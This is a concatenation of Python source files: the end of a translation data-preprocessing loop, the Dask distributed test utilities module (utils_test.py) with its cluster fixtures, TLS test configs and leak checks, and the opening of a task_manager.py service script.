if len(source_sentences) >= self.MAX_SOURCE_TOKEN_LENGTH or \
len(target_sentences) >= self.MAX_TARGET_TOKEN_LENGTH:
print "skipped {0} and {1}".format(len(source_sentences), len(target_sentences))
continue
source_sentences = " ".join([str(x) for x in source_sentences])
target_sentences = " ".join([str(x) for x in target_sentences])
data_source = self.data_source_train
data_target = self.data_target_train
if not is_train:
data_source = self.data_source_test
data_target = self.data_target_test
with open(data_source, "a+") as f2:
f2.write(source_sentences + "\n")
with open(data_target, "a+") as f2:
f2.write(target_sentences + "\n")
|
utils_test.py
|
import asyncio
import collections
import gc
from contextlib import contextmanager, suppress
import copy
import functools
from glob import glob
import io
import itertools
import logging
import logging.config
import os
import queue
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
from time import sleep
import uuid
import warnings
import weakref
try:
import ssl
except ImportError:
ssl = None
import pytest
import dask
from tlz import merge, memoize, assoc
from tornado import gen
from tornado.ioloop import IOLoop
from . import system
from .client import default_client, _global_clients, Client
from .compatibility import WINDOWS
from .comm import Comm
from .config import initialize_logging
from .core import connect, rpc, CommClosedError
from .deploy import SpecCluster
from .metrics import time
from .process import _cleanup_dangling
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
log_errors,
mp_context,
get_ip,
get_ipv6,
DequeHandler,
reset_logger_locks,
sync,
iscoroutinefunction,
thread_state,
_offload_executor,
TimeoutError,
)
from .worker import Worker
from .nanny import Nanny
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
_offload_executor.submit(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
async def cleanup_global_workers():
for worker in Worker._instances:
await worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
@contextmanager
def mock_ipython():
from unittest import mock
from distributed._ipython_utils import remote_magic
ip = mock.Mock()
ip.user_ns = {}
ip.kernel = None
def get_ip():
return ip
with mock.patch("IPython.get_ipython", get_ip), mock.patch(
"distributed._ipython_utils.get_ipython", get_ip
):
yield ip
# cleanup remote_magic client cache
for kc in remote_magic._clients.values():
kc.stop_channels()
remote_magic._clients.clear()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict = collections.defaultdict(int)
_varying_key_gen = itertools.count()
class _ModuleSlot:
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
async def geninc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
async def asyncinc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
_readone_queues = {}
async def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = asyncio.Queue()
async def background_read():
while True:
try:
messages = await comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
background_read()
msg = await q.get()
if msg is None:
raise CommClosedError
else:
return msg
def run_scheduler(q, nputs, port=0, **kwargs):
from distributed import Scheduler
# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
async def _():
scheduler = await Scheduler(
validate=True, host="127.0.0.1", port=port, **kwargs
)
for i in range(nputs):
q.put(scheduler.address)
await scheduler.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, **kwargs):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Worker(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, **kwargs):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Nanny(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
yield
# Some streams can take a bit of time to notice their peer
# has closed, and keep a coroutine (*) waiting for a CommClosedError
# before calling close_rpc() after a CommClosedError.
# This would happen especially if a non-localhost address is used,
# as Nanny does.
# (*) (example: gather_from_workers())
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
async def wait():
await async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
@contextmanager
def cluster(
nworkers=2,
nanny=False,
worker_kwargs={},
active_rpc_timeout=1,
disconnect_timeout=3,
scheduler_kwargs={},
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1),
kwargs=scheduler_kwargs,
)
ws.add(scheduler)
scheduler.daemon = True
scheduler.start()
# Launch workers
workers = []
for i in range(nworkers):
q = mp_context.Queue()
fn = "_test_worker-%s" % uuid.uuid4()
kwargs = merge(
{
"nthreads": 1,
"local_directory": fn,
"memory_limit": system.MEMORY_LIMIT,
},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q),
kwargs=kwargs,
)
ws.add(proc)
workers.append({"proc": proc, "queue": q, "dir": fn})
for worker in workers:
worker["proc"].start()
try:
for worker in workers:
worker["address"] = worker["queue"].get(timeout=5)
except queue.Empty:
raise pytest.xfail.Exception("Worker failed to start in test")
saddr = scheduler_q.get()
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {"connection_args": security.get_connection_args("client")}
except KeyError:
rpc_kwargs = {}
with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = loop.run_sync(s.ncores)
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers
]
finally:
logger.debug("Closing out test cluster")
loop.run_sync(
lambda: disconnect_all(
[w["address"] for w in workers],
timeout=disconnect_timeout,
rpc_kwargs=rpc_kwargs,
)
)
loop.run_sync(
lambda: disconnect(
saddr, timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs
)
)
scheduler.terminate()
scheduler_q.close()
scheduler_q._reader.close()
scheduler_q._writer.close()
for w in workers:
w["proc"].terminate()
w["queue"].close()
w["queue"]._reader.close()
w["queue"]._writer.close()
scheduler.join(2)
del scheduler
for proc in [w["proc"] for w in workers]:
proc.join(timeout=2)
with suppress(UnboundLocalError):
del worker, w, proc
del workers[:]
for fn in glob("_test_worker-*"):
with suppress(OSError):
shutil.rmtree(fn)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
start = time()
while any(proc.is_alive() for proc in ws):
text = str(list(ws))
sleep(0.2)
assert time() < start + 5, ("Workers still around after five seconds", text)
async def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
async def do_disconnect():
with suppress(EnvironmentError, CommClosedError):
with rpc(addr, **rpc_kwargs) as w:
await w.terminate(close=True)
await asyncio.wait_for(do_disconnect(), timeout=timeout)
async def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
await asyncio.gather(*[disconnect(addr, timeout, rpc_kwargs) for addr in addresses])
def gen_test(timeout=10):
""" Coroutine test
@gen_test(timeout=5)
async def test_foo():
await ... # use tornado coroutines
"""
def _(func):
def test_func():
with clean() as loop:
if iscoroutinefunction(func):
cor = func
else:
cor = gen.coroutine(func)
loop.run_sync(cor, timeout=timeout)
return test_func
return _
from .scheduler import Scheduler
from .worker import Worker
async def start_cluster(
nthreads,
scheduler_addr,
loop,
security=None,
Worker=Worker,
scheduler_kwargs={},
worker_kwargs={},
):
s = await Scheduler(
loop=loop,
validate=True,
security=security,
port=0,
host=scheduler_addr,
**scheduler_kwargs,
)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(merge(worker_kwargs, ncore[2]) if len(ncore) > 2 else worker_kwargs),
)
for i, ncore in enumerate(nthreads)
]
# for w in workers:
# w.rpc = workers[0].rpc
await asyncio.gather(*workers)
start = time()
while len(s.workers) < len(nthreads) or any(
comm.comm is None for comm in s.stream_comms.values()
):
await asyncio.sleep(0.01)
if time() - start > 5:
await asyncio.gather(*[w.close(timeout=1) for w in workers])
await s.close(fast=True)
raise Exception("Cluster creation timeout")
return s, workers
async def end_cluster(s, workers):
logger.debug("Closing out test cluster")
async def end_worker(w):
with suppress(TimeoutError, CommClosedError, EnvironmentError):
await w.close(report=False)
await asyncio.gather(*[end_worker(w) for w in workers])
await s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 2)],
ncores=None,
scheduler="127.0.0.1",
timeout=10,
security=None,
Worker=Worker,
client=False,
scheduler_kwargs={},
worker_kwargs={},
client_kwargs={},
active_rpc_timeout=1,
config={},
clean_kwargs={},
allow_unclosed=False,
):
from distributed import Client
""" Coroutine test with small cluster
@gen_cluster()
async def test_foo(scheduler, worker1, worker2):
await ... # use tornado coroutines
See also:
start
end
"""
if ncores is not None:
warnings.warn("ncores= has moved to nthreads=", stacklevel=2)
nthreads = ncores
worker_kwargs = merge(
{"memory_limit": system.MEMORY_LIMIT, "death_timeout": 10}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
func = gen.coroutine(func)
def test_func():
result = None
workers = []
with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop:
async def coro():
with dask.config.set(config):
s = False
for i in range(5):
try:
s, ws = await start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster, retrying",
exc_info=True,
)
await asyncio.sleep(1)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = await Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs,
)
args = [c] + args
try:
future = func(*args)
if timeout:
future = asyncio.wait_for(future, timeout)
result = await future
if s.validate:
s.validate_state()
finally:
if client and c.status not in ("closing", "closed"):
await c._close(fast=s.status == "closed")
await end_cluster(s, workers)
await asyncio.wait_for(cleanup_global_workers(), 1)
try:
c = await default_client()
except ValueError:
pass
else:
await c._close(fast=True)
def get_unclosed():
return [c for c in Comm._instances if not c.closed()] + [
c
for c in _global_clients.values()
if c.status != "closed"
]
try:
start = time()
while time() < start + 5:
gc.collect()
if not get_unclosed():
break
await asyncio.sleep(0.05)
else:
if allow_unclosed:
print(f"Unclosed Comms: {get_unclosed()}")
else:
raise RuntimeError("Unclosed Comms", get_unclosed())
finally:
Comm._instances.clear()
_global_clients.clear()
return result
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except EnvironmentError:
# zict backends can fail if their storage directory
# was already removed
pass
del w.data
return result
return test_func
return _
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
proc.wait(10)
finally:
# Make sure we don't leave the process lingering around
with suppress(OSError):
proc.kill()
@contextmanager
def popen(args, **kwargs):
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
try:
yield proc
except Exception:
dump_stdout = True
raise
finally:
try:
terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
out, err = proc.communicate()
if dump_stdout:
print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0])
print(err.decode())
print("\n\nPrint from stdout\n=================\n")
print(out.decode())
def wait_for_port(address, timeout=5):
assert isinstance(address, tuple)
deadline = time() + timeout
while True:
timeout = deadline - time()
if timeout < 0:
raise RuntimeError("Failed to connect to %s" % (address,))
try:
sock = socket.create_connection(address, timeout=timeout)
except EnvironmentError:
pass
else:
sock.close()
break
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
async def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
await asyncio.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
except EnvironmentError:
return False
else:
return True
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
async def assert_can_connect(addr, timeout=0.5, **kwargs):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_cannot_connect(
addr, timeout=0.5, exception_class=EnvironmentError, **kwargs
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
with pytest.raises(exception_class):
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_can_connect_from_everywhere_4_6(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_4(
port, protocol="tcp", **kwargs,
):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_cannot_connect(
"%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs
),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_4(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, **kwargs)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, **kwargs),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_6(port, **kwargs):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_6(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs)
]
await asyncio.gather(*futures)
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger.
"""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = io.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler.
"""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = io.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from .config import defaults
config = dask.config.config
orig_config = copy.deepcopy(config)
try:
config.clear()
config.update(copy.deepcopy(defaults))
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
return {
"distributed": {
"comm": {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
}
}
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["distributed"]["comm"]["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip("rlimit too low (%s) and can't be increased: %s" % (soft, e))
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
@contextmanager
def save_sys_modules():
old_modules = sys.modules
old_path = sys.path
try:
yield
finally:
for i, elem in enumerate(sys.path):
if elem not in old_path:
del sys.path[i]
for elem in sys.modules.keys():
if elem not in old_modules:
del sys.modules[elem]
@contextmanager
def check_thread_leak():
active_threads_start = set(threading._active)
yield
start = time()
while True:
bad = [
t
for t, v in threading._active.items()
if t not in active_threads_start
and "Threaded" not in v.name
and "watch message" not in v.name
and "TCP-Executor" not in v.name
]
if not bad:
break
else:
sleep(0.01)
if time() > start + 5:
from distributed import profile
tid = bad[0]
thread = threading._active[tid]
call_stacks = profile.call_stack(sys._current_frames()[tid])
assert False, (thread, call_stacks)
@contextmanager
def check_process_leak(check=True):
for proc in mp_context.active_children():
proc.terminate()
yield
if check:
for i in range(100):
if not set(mp_context.active_children()):
break
else:
sleep(0.2)
else:
assert not mp_context.active_children()
_cleanup_dangling()
for proc in mp_context.active_children():
proc.terminate()
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
with suppress(RuntimeError): # closed IOLoop
w.loop.add_callback(w.close, report=False, executor_wait=False)
if w.status == "running":
w.loop.add_callback(w.close)
Worker._instances.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
print("Unclosed Comms", L)
# raise ValueError("Unclosed Comms", L)
assert all(n.status == "closed" or n.status == "init" for n in Nanny._instances), {
n: n.status for n in Nanny._instances
}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == "closed" for c in SpecCluster._instances), list(
SpecCluster._instances
)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True):
@contextmanager
def null():
yield
with check_thread_leak() if threads else null():
with pristine_loop() as loop:
with check_process_leak(check=processes):
with check_instances() if instances else null():
with check_active_rpc(loop, timeout):
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
with suppress(AttributeError):
del thread_state.on_event_loop_thread
@pytest.fixture
def cleanup():
with clean():
yield
|
task_manager.py
|
#!/usr/bin/env python
import os
import sys
from os import _exit, getenv
from sys import stderr
#from version import gversion
PROGRAM_INFO = "VddbAsync task_manager 1.2.1.0"
if len(sys.argv) > 1:
print PROGRAM_INFO
sys.exit(0)
path = getenv('MW_HOME')
if path == None:
stderr.write("MW_HOME not set in environment, program cannot start.")
_exit(1)
sys.path.append('/'.join([path, 'lib']))
os.environ['PATH'] = ':'.join([os.environ['PATH'], '/'.join([path, 'bin'])])
from cleaner import cleaner_cluster
from manager import manager
from parse_config import parse_config
from fetcher import fetcher
from loader import load_database
from picker import picker
from utils import check_kingship, make_db_pool, start_dbpc, make_hbase_pool, \
make_redis_conn
#from dbpcer import dbpcer
from dbpc import dbpc
import logging.config
from threading import Condition, Event, Lock, Thread
import getopt
DB_RESERVE_CONN = 5
def main():
# use MW_HOME to find etc/ & var/ directories
path = getenv('MW_HOME')
if path == None:
stderr.write("MW_HOME not set in environment, program cannot start.")
_exit(1)
logging.config.fileConfig('/'.join([path, 'etc', 'logging.conf']),
